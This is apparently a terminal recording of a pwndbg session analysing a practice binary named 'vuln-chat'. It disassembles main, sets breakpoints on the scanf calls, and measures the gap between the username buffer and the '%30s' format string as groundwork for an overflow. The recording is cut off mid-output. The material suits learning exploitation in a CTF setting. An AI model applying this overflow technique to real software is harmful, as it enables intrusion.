[39.285748, "o", "\u001b[0m02\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0008\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-028 \u001b[33m0xffffcd50\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[35m0xf7fbf400\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[0m0xf7d68000\u001b[0m\u001b[0m ◂— \u001b[0m0x464c457f\r\n\u001b[0m03\u001b[0m\u001b[0m:\u001b[0m\u001b[0m000c\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-024 \u001b[33m0xffffcd54\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n\u001b[0m... ↓        4 skipped\u001b[0m\r\n"]
[39.28585, "o", "\u001b[34m─────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────\u001b[0m\r\n ► 0 0x8048590 main+6\r\n   1 0xf7d8ccc3 None\r\n"]
[39.286283, "o", "   2 0xf7d8cd88 __libc_start_main+136\r\n   3 0x8048491 _start+33\r\n\u001b[34m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\r\n"]
[39.286605, "o", "\u001b[?2004l\r\u001b[?2004h"]
[39.286876, "o", "\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m\u001b[2S\u001b[2A"]
[40.343134, "o", "d"]
[40.430075, "o", "i"]
[40.594792, "o", "s"]
[41.331498, "o", "a"]
[41.523381, "o", "s"]
[41.683736, "o", "s"]
[41.794813, "o", " "]
[42.043596, "o", "m"]
[42.167647, "o", "a"]
[42.188317, "o", "i"]
[42.34005, "o", "n"]
[42.772483, "o", "\r\n\u001b[?2004l\r"]
[42.772771, "o", "Dump of assembler code for function \u001b[33mmain\u001b[m:\r\n"]
[42.772905, "o", "   \u001b[34m0x0804858a\u001b[m <+0>:\t\u001b[32mpush   \u001b[m\u001b[31mebp\u001b[m\r\n   \u001b[34m0x0804858b\u001b[m <+1>:\t\u001b[32mmov    \u001b[m\u001b[31mebp\u001b[m,\u001b[31mesp\u001b[m\r\n   \u001b[34m0x0804858d\u001b[m <+3>:\t\u001b[32msub    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x30\u001b[m\r\n"]
[42.773079, "o", "=> \u001b[34m0x08048590\u001b[m <+6>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,\u001b[31mds\u001b[m:\u001b[34m0x8049a60\u001b[m\r\n   \u001b[34m0x08048595\u001b[m <+11>:\t\u001b[32mpush   \u001b[m\u001b[34m0x14\u001b[m\r\n   \u001b[34m0x08048597\u001b[m <+13>:\t\u001b[32mpush   \u001b[m\u001b[34m0x2\u001b[m\r\n"]
[42.773374, "o", "   \u001b[34m0x08048599\u001b[m <+15>:\t\u001b[32mpush   \u001b[m\u001b[34m0x0\u001b[m\r\n   \u001b[34m0x0804859b\u001b[m <+17>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x0804859c\u001b[m <+18>:\t\u001b[32mcall   \u001b[m\u001b[34m0x8048450\u001b[m <\u001b[33msetvbuf@plt\u001b[m>\r\n   \u001b[34m0x080485a1\u001b[m <+23>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x10\u001b[m\r\n   \u001b[34m0x080485a4\u001b[m <+26>:\t\u001b[32mpush   \u001b[m\u001b[34m0x8048714\u001b[m\r\n"]
[42.773518, "o", "   \u001b[34m0x080485a9\u001b[m <+31>:\t\u001b[32mcall   \u001b[m\u001b[34m0x8048410\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n"]
[42.773635, "o", "   \u001b[34m0x080485ae\u001b[m <+36>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x4\u001b[m\r\n   \u001b[34m0x080485b1\u001b[m <+39>:\t\u001b[32mpush   \u001b[m\u001b[34m0x8048743\u001b[m\r\n   \u001b[34m0x080485b6\u001b[m <+44>:\t\u001b[32mcall   \u001b[m\u001b[34m0x80483e0\u001b[m <\u001b[33mprintf@plt\u001b[m>\r\n   \u001b[34m0x080485bb\u001b[m <+49>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x4\u001b[m\r\n   \u001b[34m0x080485be\u001b[m <+52>:\t\u001b[32mmov    \u001b[mDWORD PTR [\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x5\u001b[m],\u001b[34m0x73303325\u001b[m\r\n   \u001b[34m0x080485c5\u001b[m <+59>:\t\u001b[32mmov    \u001b[mBYTE PTR [\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x1\u001b[m],\u001b[34m0x0\u001b[m\r\n"]
[42.774022, "o", "   \u001b[34m0x080485c9\u001b[m <+63>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x19\u001b[m]\r\n   \u001b[34m0x080485cc\u001b[m <+66>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x080485cd\u001b[m <+67>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x5\u001b[m]\r\n   \u001b[34m0x080485d0\u001b[m <+70>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x080485d1\u001b[m <+71>:\t\u001b[32mcall   \u001b[m\u001b[34m0x8048460\u001b[m <\u001b[33m__isoc99_scanf@plt\u001b[m>\r\n   \u001b[34m0x080485d6\u001b[m <+76>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x8\u001b[m\r\n   \u001b[34m0x080485d9\u001b[m <+79>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x19\u001b[m]\r\n"]
[42.774132, "o", "   \u001b[34m0x080485dc\u001b[m <+82>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x080485dd\u001b[m <+83>:\t\u001b[32mpush   \u001b[m\u001b[34m0x8048759\u001b[m\r\n   \u001b[34m0x080485e2\u001b[m <+88>:\t\u001b[32mcall   \u001b[m\u001b[34m0x80483e0\u001b[m <\u001b[33mprintf@plt\u001b[m>\r\n"]
[42.774759, "o", "   \u001b[34m0x080485e7\u001b[m <+93>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x8\u001b[m\r\n   \u001b[34m0x080485ea\u001b[m <+96>:\t\u001b[32mpush   \u001b[m\u001b[34m0x8048766\u001b[m\r\n   \u001b[34m0x080485ef\u001b[m <+101>:\t\u001b[32mcall   \u001b[m\u001b[34m0x8048410\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n   \u001b[34m0x080485f4\u001b[m <+106>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x4\u001b[m\r\n   \u001b[34m0x080485f7\u001b[m <+109>:\t\u001b[32mpush   \u001b[m\u001b[34m0x1\u001b[m\r\n   \u001b[34m0x080485f9\u001b[m <+111>:\t\u001b[32mcall   \u001b[m\u001b[34m0x8048400\u001b[m <\u001b[33msleep@plt\u001b[m>\r\n   \u001b[34m0x080485fe\u001b[m <+116>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x4\u001b[m\r\n   \u001b[34m0x08048601\u001b[m <+119>:\t\u001b[32mpush   \u001b[m\u001b[34m0x804877c\u001b[m\r\n   \u001b[34m0x08048606\u001b[m <+124>:\t\u001b[32mcall   \u001b[m\u001b[34m0x8048410\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n   \u001b[34m0x0804860b\u001b[m <+129>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x4\u001b[m\r\n   \u001b[34m0x0804860e\u001b[m <+132>:\t\u001b[32mpush   \u001b[m\u001b[34m0x80487a4\u001b[m\r\n   \u001b[34m0x08048613\u001b[m <+137>:\t\u001b[32mcall   \u001b[m\u001b[34m0x8048410\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n   \u001b[34m0x08048618\u001b[m <+142>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x4\u001b[m\r\n"]
[42.774925, "o", "   \u001b[34m0x0804861b\u001b[m <+145>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x19\u001b[m]\r\n   \u001b[34m0x0804861e\u001b[m <+148>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n"]
[42.775846, "o", "   \u001b[34m0x0804861f\u001b[m <+149>:\t\u001b[32mpush   \u001b[m\u001b[34m0x80487e6\u001b[m\r\n   \u001b[34m0x08048624\u001b[m <+154>:\t\u001b[32mcall   \u001b[m\u001b[34m0x80483e0\u001b[m <\u001b[33mprintf@plt\u001b[m>\r\n   \u001b[34m0x08048629\u001b[m <+159>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x8\u001b[m\r\n"]
[42.77619, "o", "   \u001b[34m0x0804862c\u001b[m <+162>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x2d\u001b[m]\r\n   \u001b[34m0x0804862f\u001b[m <+165>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x08048630\u001b[m <+166>:\t\u001b[32mlea    \u001b[m\u001b[31meax\u001b[m,[\u001b[31mebp\u001b[m\u001b[34m-\u001b[m\u001b[34m0x5\u001b[m]\r\n   \u001b[34m0x08048633\u001b[m <+169>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x08048634\u001b[m <+170>:\t\u001b[32mcall   \u001b[m\u001b[34m0x8048460\u001b[m <\u001b[33m__isoc99_scanf@plt\u001b[m>\r\n   \u001b[34m0x08048639\u001b[m <+175>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x8\u001b[m\r\n   \u001b[34m0x0804863c\u001b[m <+178>:\t\u001b[32mpush   \u001b[m\u001b[34m0x80487ec\u001b[m\r\n   \u001b[34m0x08048641\u001b[m <+183>:\t\u001b[32mcall   \u001b[m\u001b[34m0x8048410\u001b[m <\u001b[33mputs@plt\u001b[m>\r\n   \u001b[34m0x08048646\u001b[m <+188>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x4\u001b[m\r\n   \u001b[34m0x08048649\u001b[m <+191>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,\u001b[31mds\u001b[m:\u001b[34m0x8049a60\u001b[m\r\n   \u001b[34m0x0804864e\u001b[m <+196>:\t\u001b[32mpush   \u001b[m\u001b[31meax\u001b[m\r\n   \u001b[34m0x0804864f\u001b[m <+197>:\t\u001b[32mcall   \u001b[m\u001b[34m0x80483f0\u001b[m <\u001b[33mfflush@plt\u001b[m>\r\n   \u001b[34m0x08048654\u001b[m <+202>:\t\u001b[32madd    \u001b[m\u001b[31mesp\u001b[m,\u001b[34m0x4\u001b[m\r\n   \u001b[34m0x08048657\u001b[m <+205>:\t\u001b[32mmov    \u001b[m\u001b[31meax\u001b[m,\u001b[34m0x0\u001b[m\r\n   \u001b[34m0x0804865c\u001b[m <+210>:\t\u001b[32mleave\u001b[m\r\n   \u001b[34m0x0804865d\u001b[m <+211>:\t\u001b[32mret\u001b[m\r\nEnd of assembler dump.\r\n"]
[42.776293, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[48.548752, "o", "b"]
[48.755829, "o", " "]
[49.123743, "o", "*"]
[49.673625, "o", "\u001b[7m 0x080485d6\u001b[27m"]
[50.334403, "o", "\b\b\b\b\b\b\b\b\b\b\b 0x080485d6\r\n\u001b[?2004l\r"]
[50.334751, "o", "Breakpoint 2 at \u001b[34m0x80485d6\u001b[m\r\n"]
[50.334944, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[54.487386, "o", "b"]
[54.703382, "o", " "]
[54.975682, "o", "*"]
[55.567222, "o", "\u001b[7m0x08048639\u001b[27m"]
[56.029069, "o", "\b\b\b\b\b\b\b\b\b\b0x08048639\r\n\u001b[?2004l\r"]
[56.029429, "o", "Breakpoint 3 at \u001b[34m0x8048639\u001b[m\r\n"]
[56.029564, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[57.273413, "o", "c"]
[57.466066, "o", "\r\n\u001b[?2004l\r"]
[57.466167, "o", "Continuing.\r\n"]
[57.467552, "o", "----------- Welcome to vuln-chat -------------\r\nEnter your username: "]
[58.826453, "o", "A"]
[59.326259, "o", "A"]
[59.356346, "o", "A"]
[59.385924, "o", "A"]
[59.416633, "o", "A"]
[59.448197, "o", "A"]
[59.478769, "o", "A"]
[59.508974, "o", "A"]
[59.539918, "o", "A"]
[59.570429, "o", "A"]
[59.600802, "o", "A"]
[59.631328, "o", "A"]
[59.661884, "o", "A"]
[59.692449, "o", "A"]
[59.722659, "o", "A"]
[59.753247, "o", "A"]
[59.975546, "o", "\r\n"]
[59.976539, "o", "\r\nBreakpoint 2, \u001b[34m0x080485d6\u001b[m in \u001b[33mmain\u001b[m ()\r\n"]
[59.978504, "o", "\u001b[?2004h"]
[60.003752, "o", "LEGEND: \u001b[33mSTACK\u001b[0m | \u001b[34mHEAP\u001b[0m | \u001b[31mCODE\u001b[0m | \u001b[35mDATA\u001b[0m | \u001b[4m\u001b[31mWX\u001b[0m\u001b[4m\u001b[0m | \u001b[0mRODATA\u001b[0m\r\n\u001b[34m────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────\u001b[0m\r\n\u001b[31m*\u001b[0m\u001b[31m\u001b[1mEAX \u001b[0m\u001b[31m\u001b[0m 1\r\n \u001b[1mEBX \u001b[0m \u001b[0m0xf7f9ae14\u001b[0m\u001b[0m ◂— \u001b[0m0x232d0c /* '\\x0c-#' */\r\n\u001b[31m*\u001b[0m\u001b[31m\u001b[1mECX \u001b[0m\u001b[31m\u001b[0m \u001b[35m0xf7fc0540\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n\u001b[31m*\u001b[0m\u001b[31m\u001b[1mEDX \u001b[0m\u001b[31m\u001b[0m 0\r\n \u001b[1mEDI \u001b[0m \u001b[0m0xf7ffcb60 (_rtld_global_ro)\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n"]
[60.003893, "o", " \u001b[1mESI \u001b[0m \u001b[31m0x8048660 (__libc_csu_init)\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mebp\u001b[39m\r\n \u001b[1mEBP \u001b[0m \u001b[33m0xffffcd78\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n\u001b[31m*\u001b[0m\u001b[31m\u001b[1mESP \u001b[0m\u001b[31m\u001b[0m \u001b[33m0xffffcd40\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[33m0xffffcd73\u001b[0m\u001b[0m ◂— \u001b[0m'%30s'\r\n\u001b[31m*\u001b[0m\u001b[31m\u001b[1mEIP \u001b[0m\u001b[31m\u001b[0m \u001b[31m0x80485d6 (main+76)\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148madd\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m8\u001b[39m\r\n\u001b[34m──────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]───────────────────────────────────────────────────\u001b[0m\r\n"]
[60.004221, "o", " ► \u001b[1m\u001b[32m0x80485d6\u001b[0m\u001b[1m\u001b[0m \u001b[1m\u001b[32m<main+76>  \u001b[0m\u001b[1m\u001b[0m   \u001b[1m\u001b[32m\u001b[38;5;148madd\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m8\u001b[39m\u001b[0m\u001b[1m\u001b[0m                \u001b[31m\u001b[1mESP\u001b[0m\u001b[31m\u001b[0m => \u001b[33m0xffffcd48\u001b[0m (0xffffcd40 + 0x8)\r\n   \u001b[0m0x80485d9\u001b[0m \u001b[0m<main+79>  \u001b[0m   \u001b[38;5;148mlea\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81meax\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;15m[\u001b[39m\u001b[38;5;81mebp\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;15m-\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m0x19\u001b[39m\u001b[38;5;15m]\u001b[39m     \u001b[31m\u001b[1mEAX\u001b[0m\u001b[31m\u001b[0m => \u001b[33m0xffffcd5f\u001b[0m\u001b[0m ◂— \u001b[0m'AAAAAAAAAAAAAAAA'\r\n   \u001b[0m0x80485dc\u001b[0m \u001b[0m<main+82>  \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;81meax\u001b[39m\r\n   \u001b[0m0x80485dd\u001b[0m \u001b[0m<main+83>  \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m0x8048759\u001b[39m\r\n   \u001b[0m0x80485e2\u001b[0m \u001b[0m<main+88>  \u001b[0m   \u001b[38;5;148m\u001b[1mcall\u001b[0m\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m\u001b[31mprintf@plt\u001b[0m\u001b[39m                  <\u001b[31mprintf@plt\u001b[0m>\r\n \r\n   \u001b[0m0x80485e7\u001b[0m \u001b[0m<main+93>  \u001b[0m   \u001b[38;5;148madd\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m8\u001b[39m\r\n"]
[60.004461, "o", "   \u001b[0m0x80485ea\u001b[0m \u001b[0m<main+96>  \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m0x8048766\u001b[39m\r\n   \u001b[0m0x80485ef\u001b[0m \u001b[0m<main+101> \u001b[0m   \u001b[38;5;148m\u001b[1mcall\u001b[0m\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m\u001b[31mputs@plt\u001b[0m\u001b[39m                    <\u001b[31mputs@plt\u001b[0m>\r\n \r\n   \u001b[0m0x80485f4\u001b[0m \u001b[0m<main+106> \u001b[0m   \u001b[38;5;148madd\u001b[39m\u001b[38;5;15m    \u001b[39m\u001b[38;5;81mesp\u001b[39m\u001b[38;5;15m,\u001b[39m\u001b[38;5;15m \u001b[39m\u001b[38;5;141m4\u001b[39m\r\n"]
[60.004592, "o", "   \u001b[0m0x80485f7\u001b[0m \u001b[0m<main+109> \u001b[0m   \u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m1\u001b[39m\r\n   \u001b[0m0x80485f9\u001b[0m \u001b[0m<main+111> \u001b[0m   \u001b[38;5;148m\u001b[1mcall\u001b[0m\u001b[39m\u001b[38;5;15m   \u001b[39m\u001b[38;5;141m\u001b[31msleep@plt\u001b[0m\u001b[39m                   <\u001b[31msleep@plt\u001b[0m>\r\n\u001b[34m───────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────\u001b[0m\r\n\u001b[0m00\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0000\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m \u001b[1mesp\u001b[0m \u001b[33m0xffffcd40\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[33m0xffffcd73\u001b[0m\u001b[0m ◂— \u001b[0m'%30s'\r\n\u001b[0m01\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0004\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-034 \u001b[33m0xffffcd44\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[33m0xffffcd5f\u001b[0m\u001b[0m ◂— \u001b[0m'AAAAAAAAAAAAAAAA'\r\n\u001b[0m02\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0008\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-030 \u001b[33m0xffffcd48\u001b[0m\u001b[0m ◂— \u001b[0m0xffffffff\r\n\u001b[0m03\u001b[0m\u001b[0m:\u001b[0m\u001b[0m000c\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-02c \u001b[33m0xffffcd4c\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[0m0xf7d799dc\u001b[0m\u001b[0m ◂— \u001b[0m0x920 /* ' \\t' */\r\n\u001b[0m04\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0010\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-028 \u001b[33m0xffffcd50\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[35m0xf7fbf400\u001b[0m\u001b[0m —▸ \u001b[0m\u001b[0m0xf7d68000\u001b[0m\u001b[0m ◂— \u001b[0m0x464c457f\r\n"]
[60.004701, "o", "\u001b[0m05\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0014\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-024 \u001b[33m0xffffcd54\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n\u001b[0m06\u001b[0m\u001b[0m:\u001b[0m\u001b[0m0018\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-020 \u001b[33m0xffffcd58\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n\u001b[0m07\u001b[0m\u001b[0m:\u001b[0m\u001b[0m001c\u001b[0m\u001b[0m│\u001b[0m\u001b[0m\u001b[0m-01c \u001b[33m0xffffcd5c\u001b[0m\u001b[0m ◂— \u001b[0m0x41000000\r\n\u001b[34m─────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────\u001b[0m\r\n"]
[60.005098, "o", " ► 0 0x80485d6 main+76\r\n   1 0xf7d8ccc3 None\r\n   2 0xf7d8cd88 __libc_start_main+136\r\n   3 0x8048491 _start+33\r\n\u001b[34m───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\r\n"]
[60.005414, "o", "\u001b[?2004l\r\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[61.347552, "o", "d"]
[61.444316, "o", "i"]
[61.584549, "o", "s"]
[61.776084, "o", "a"]
[61.993815, "o", "s"]
[62.145205, "o", "s"]
[62.296318, "o", " "]
[62.732373, "o", "a"]
[63.147038, "o", "\b\u001b[K"]
[63.524294, "o", "a"]
[63.972366, "o", "\b\u001b[K"]
[64.232857, "o", "m"]
[64.345078, "o", "a"]
[64.473403, "o", "i"]
[64.588295, "o", "n"]
[65.007765, "o", "\b\u001b[K"]
[65.507911, "o", "\b\u001b[K"]
[65.538751, "o", "\b\u001b[K"]
[65.569058, "o", "\b\u001b[K"]
[65.599123, "o", "\b\u001b[K"]
[65.629887, "o", "\b\u001b[K"]
[65.660828, "o", "\b\u001b[K"]
[65.691204, "o", "\b\u001b[K"]
[65.721622, "o", "\b\u001b[K"]
[65.752259, "o", "\b\u001b[K"]
[65.78218, "o", "\b\u001b[K"]
[65.812875, "o", "\u0007"]
[65.844277, "o", "\u0007"]
[65.874734, "o", "\u0007"]
[65.905358, "o", "\u0007"]
[65.935773, "o", "\u0007"]
[65.965872, "o", "\u0007"]
[66.306544, "o", "x"]
[66.448084, "o", "/"]
[79.336184, "o", "s"]
[80.338895, "o", " "]
[80.754335, "o", "$"]
[81.438536, "o", "\u001b[7mebp-0x5\u001b[27m"]
[81.886805, "o", "\b\b\b\b\b\b\bebp-0x5\r\n\u001b[?2004l\r"]
[81.887659, "o", "\u001b[34m0xffffcd73\u001b[m:\t\"%30s\"\r\n"]
[81.888026, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[83.595859, "o", "x/s $ebp-0x5"]
[84.623486, "o", "\b\u001b[K"]
[85.082006, "o", "1"]
[85.222889, "o", "9"]
[85.615945, "o", "\r\n\u001b[?2004l\r"]
[85.616352, "o", "\u001b[34m0xffffcd5f\u001b[m:\t'A' <repeats 16 times>\r\n"]
[85.616607, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[86.62613, "o", "x/s $ebp-0x19"]
[86.907546, "o", "\b"]
[87.407404, "o", "\b"]
[87.43737, "o", "\b"]
[87.467569, "o", "\b"]
[87.497817, "o", "\b"]
[87.528229, "o", "\b"]
[87.557999, "o", "\b"]
[87.588948, "o", "\b"]
[87.619788, "o", "\b"]
[87.650229, "o", "\b"]
[88.268156, "o", "\b\u001b[1P $ebp-0x19\b\b\b\b\b\b\b\b\b\b"]
[88.509493, "o", "2 $ebp-0x19\b\b\b\b\b\b\b\b\b\b"]
[88.67184, "o", "0 $ebp-0x19\b\b\b\b\b\b\b\b\b\b"]
[89.503001, "o", "w $ebp-0x19\b\b\b\b\b\b\b\b\b\b"]
[89.714091, "o", "x $ebp-0x19\b\b\b\b\b\b\b\b\b\b"]
[89.900528, "o", "\r\n\u001b[?2004l\r"]
[89.900908, "o", "\u001b[34m0xffffcd5f\u001b[m:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n"]
[89.901066, "o", "\u001b[34m0xffffcd6f\u001b[m:\t0x00000000\t0x73303325\t0x00000000\t0xd8ccc300\r\n"]
[89.901302, "o", "\u001b[34m0xffffcd7f\u001b[m:\t0x000001f7\t0xffce3400\t0xffce3cff\t0xffcda0ff\r\n"]
[89.901475, "o", "\u001b[34m0xffffcd8f\u001b[m:\t0xf9ae14ff\t0x04858af7\t0x00000108\t0xffce3400\r\n"]
[89.901584, "o", "\u001b[34m0xffffcd9f\u001b[m:\t0xf9ae14ff\t0x048660f7\t0xffcb6008\t0x000000f7\r\n"]
[89.901805, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[93.722422, "o", "p"]
[93.918126, "o", " "]
[96.787606, "o", "\u001b[7m0xffffcd73\u001b[27m"]
[97.191226, "o", "\b\b\b\b\b\b\b\b\b\b0xffffcd73 "]
[97.844708, "o", "-"]
[98.071935, "o", " "]
[100.723051, "o", "\u001b[7m0xffffcd5f\u001b[27m"]
[101.221663, "o", "\b\b\b\b\b\b\b\b\b\b0xffffcd5f\r\n\u001b[?2004l\r"]
[101.222036, "o", "\u001b[36m$1\u001b[m = 20\r\n"]
[101.222306, "o", "\u001b[?2004h\u001b[32m\u001b[1mpwndbg> \u001b[0m\u001b[32m\u001b[0m"]
[107.644264, "o", "c"]
[107.865164, "o", "\r\n\u001b[?2004l\r"]
[107.865296, "o", "Continuing.\r\n"]
[107.866538, "o", "Welcome AAAAAAAAAAAAAAAA!\r\nConnecting to 'djinn'\r\n"]
[108.867328, "o", "--- 'djinn' has joined your chat ---\r\ndjinn: I have the information. But how do I know I can trust you?\r\nAAAAAAAAAAAAAAAA: "]
[110.587913, "o", "B"]
[111.088811, "o", "B"]
[111.119526, "o", "B"]
[111.150167, "o", "B"]
[111.179983, "o", "B"]
[111.211387, "o", "B"]
[111.24239, "o", "B"]
[111.276701, "o", "B"]
[111.303231, "o", "B"]
[111.33362, "o", "B"]
[111.363987, "o", "B"]
[111.393964, "o", "B"]
[111.423603, "o", "B"]
[111.453469, "o", "B"]
[111.483543, "o", "B"]
[111.513984, "o", "B"]
[111.544812, "o", "B"]
[111.574719, "o", "B"]
[111.604728, "o", "B"]
[111.635628, "o", "B"]
[112.008849, "o", "\r\n"]
[112.009818, "o", "\r\nBreakpoint 3, \u001b[34m0x08048639\u001b[m in \u001b[33mmain\u001b[m ()\r\n"]
[112.011802, "o", "\u001b[?2004h"]
[112.036029, "o", "LEGEND: \u001b[33mSTACK\u001b[0m | \u001b[34mHEAP\u001b[0m | \u001b[31mCODE\u001b[0m | \u001b[35mDATA\u001b[0m | \u001b[4m\u001b[31mWX\u001b[0m\u001b[4m\u001b[0m | \u001b[0mRODATA\u001b[0m\r\n\u001b[34m────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────\u001b[0m\r\n \u001b[1mEAX \u001b[0m 1\r\n \u001b[1mEBX \u001b[0m \u001b[0m0xf7f9ae14\u001b[0m\u001b[0m ◂— \u001b[0m0x232d0c /* '\\x0c-#' */\r\n \u001b[1mECX \u001b[0m \u001b[35m0xf7fc0540\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n \u001b[1mEDX \u001b[0m 0\r\n \u001b[1mEDI \u001b[0m \u001b[0m0xf7ffcb60 (_rtld_global_ro)\u001b[0m\u001b[0m ◂— \u001b[0m0\r\n \u001b[1mESI \u001b[0m \u001b[31m0x8048660 (__libc_csu_init)\u001b[0m\u001b[0m ◂— \u001b[0m\u001b[38;5;148mpush\u001b[39m\u001b[38;5;15m 